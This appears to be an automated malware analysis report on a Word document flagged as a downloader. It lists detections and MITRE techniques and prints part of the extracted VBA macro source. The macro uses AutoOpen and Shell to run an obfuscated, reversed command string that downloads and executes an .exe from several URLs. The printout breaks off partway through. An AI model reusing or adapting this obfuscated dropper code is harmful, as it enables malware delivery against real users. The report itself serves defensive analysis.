MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() command to execute a constructed command string. This command string appears to be an obfuscated attempt to download and run a secondary payload. The ClamAV heuristic also flags this as a downloader.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-6682690-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6682690-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5008 bytes |
SHA-256: 42aa7de7ce529ec881126a3c822485572cd81732793f756ffc04ee6d56770551 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QlpHHZRDSaSz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set LwOYZJ = SfXUC
Set ozwzX = jvHKm
Set GiCKb = djjwc
Set CIpwiR = nnRwDZ
Shell OWKbk + FYHiBaulkUj + EmJtuMBUKaiYI + XbjjnRM, Format(0)
Set ZfSNGH = GNrcK
Set nqHUn = iSiXQ
Set pdcXsf = TPtnO
End Sub
Attribute VB_Name = "cKQnqEZvqf"
Function OWKbk()
On _
Error _
Resume _
Next
Set TTipvb = vqABR
Set cBVwL = MbMATS
Set hWcHi = UJFjT
Set iVrwlY = mwbjUZ
Set CSzcW = BPjJmS
VJFmbSNZ = Format(Chr(10 + 5 + 15 + 16 + 53)) + "md" + " /V^" + ":/" + Format(Chr(7 + 4 + 10 + 11 + 35)) + Format(Chr(3 + 1 + 4 + 5 + 21)) + "^s" + "^e^t U" + "^" + "Q^K=^ " + " ^ ^ " + " ^ "
Set uRrBi = KhTqw
Set GLmwGw = RFENqV
Set dKIMR = Bhtfi
Set NSJDEz = OSkni
Set CmKwfO = ThMVKk
aAwwVX = " ^ " + " ^" + " ^}}^{" + "h" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "^" + "ta" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "^" + "}" + "^;^" + "ka" + "^e" + "r" + "b^;"
Set OSQiR = SCsqi
Set kwhtOf = oZfWf
Set FQSzd = wTuFc
iWfkRLiLbdp = "O^" + "J" + "^i$^ m^" + "e" + "tI-ek"
Set bSRdVa = kLmTF
Set omtCmC = lZtFu
Set BcQvt = NGOsK
OLKEKUsM = "^ov" + "nI^;)O^" + "J^i^$" + "^" + " ^,^U^a" + "z^$(^"
Set FjdXF = fHLaj
Set ptXYbf = jiVYM
Set hYBsi = sjsQi
Set ltRqPJ = YNqUi
fNaNGMq = "eli^" + "Fdaol" + "n^wo" + "^D^.l" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "T^$^{" + "y" + "r"
Set WKFLOB = jJhwSp
Set HqlDO = RiJDTu
Set hJIiHK = KWaanK
ziVUQoBwFU = "t^" + "{)^ah" + "^o^" + "$ ni ^" + "U^a^z^" + "$(^" + "h" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "a" + "^e" + "rof;'e" + "^" + "x^e." + "'+wM^"
Set qhPMi = wVUvEj
Set vGdAc = pjiwT
Set LcbiJ = rMlfH
Set MnNLF = OPiTJ
ikKTuJGS = "d$^+^" + "'\^'" + "+" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "i^lbu" + "^p:v" + "ne^"
Set cHzQtl = lttRv
Set vKbWA = LBVWt
Set EjISUi = PEmONO
Set tUuKrK = UsmJF
mzEzUR = "$^" + "=^O^" + "Ji^$" + ";^'^" + "0^9" + "^"
Set dWcDGE = azQXoq
Set ImhkH = cjZYk
fPhpjtfqOIE = "5" + "' ^=^ ^" + "wMd$^;" + ")" + "^'^@'(" + "t" + "^ilpS." + "^'9d^M" + "^j" + "^1" + "^H" + "D" + "t7x"
Set KZNpTI = lKkXJt
Set UVdwfd = XnSkA
Set fWrUv = qJwXPV
rdvswkBZq = "/" + "mo" + Format(Chr(10 + 5 + 15 + 16 + 53)) + ".n^" + "u^gv" + "od//^" + ":^p^" + "tth^@" + "S^5u^O"
Set NwHfpF = HQlBo
TkEdnVoVw = "^u" + "^AS" + "O^" + "1f" + "/^t^" + "e" + "n." + "ets^" + "k^e"
Set jIEjf = fpwKD
Set ZtSzr = KSBMCz
Set GjJGu = aTcVzz
Set GmGlC = EGEMQa
Set bitwn = bnHQoz
Set JJUluf = jbvtc
kAiPDAA = "tn^o" + "kv//" + "^:p^tt" + "h@b^I" + "q^" + "zH" + Format(Chr(7 + 4 + 10 + 11 + 35)) + "^zI^" + "3Y/^or^" + ".^t"
Set wELkX = VJCukd
MUZZCi = "^fo^s" + "^" + "tn^irps" + ".^1" + "^3" + "^pw" + "s^l" + "^g//" + ":p^t^" + "th^@" + "^D" + Format(Chr(7 + 4 + 10 + 11 + 35)) + "^s^A" + "^S^J^E" + "/"
OWKbk = VJFmbSNZ + aAwwVX + iWfkRLiLbdp + OLKEKUsM + fNaNGMq + ziVUQoBwFU + ikKTuJGS + mzEzUR + fPhpjtfqOIE + rdvswkBZq + TkEdnVoVw + kAiPDAA + MUZZCi
Set UTjiK = dwkFto
Set iEjNwG = FqYlE
Set CHQHN = rjNfjZ
End Function
Function FYHiBaulkUj()
On _
Error _
Resume _
Next
Set iisjPU = APDwAP
Set zFzNt = plasCz
Set jZlzi = usUUv
aaIwGlVq = "mo" + Format(Chr(10 + 5 + 15 + 16 + 53)) + ".^e" + "^" + "dnar^g" + "as" + "a" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "a^tni" + "uq//^" + ":p^t" + "th^@936" + "^L" + "^" + "4^PE" + "/^"
Set DOscG = ibbHO
Set sRrNUw = jiNBkR
Set ldShV = iMAatp
FYkDO = "ku^.^o" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "^.sut" + "la^t//" + ":^" + "p^t^t^" + "h^'=a^" + "ho$^" + ";tn^" + "e^"
Set ilhXBb = HaOLQY
suvliajd = "i" + "^l" + Format(Chr(7 + 4 + 10 + 11 + 35)) + "be^W." + "teN^" + " ^t" + Format(Chr(10 + 5 + 15 + 16 + 53)) + "ej^" + "bo-wen^" + "=^l" + Format(Chr(10 + 5 + 15
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.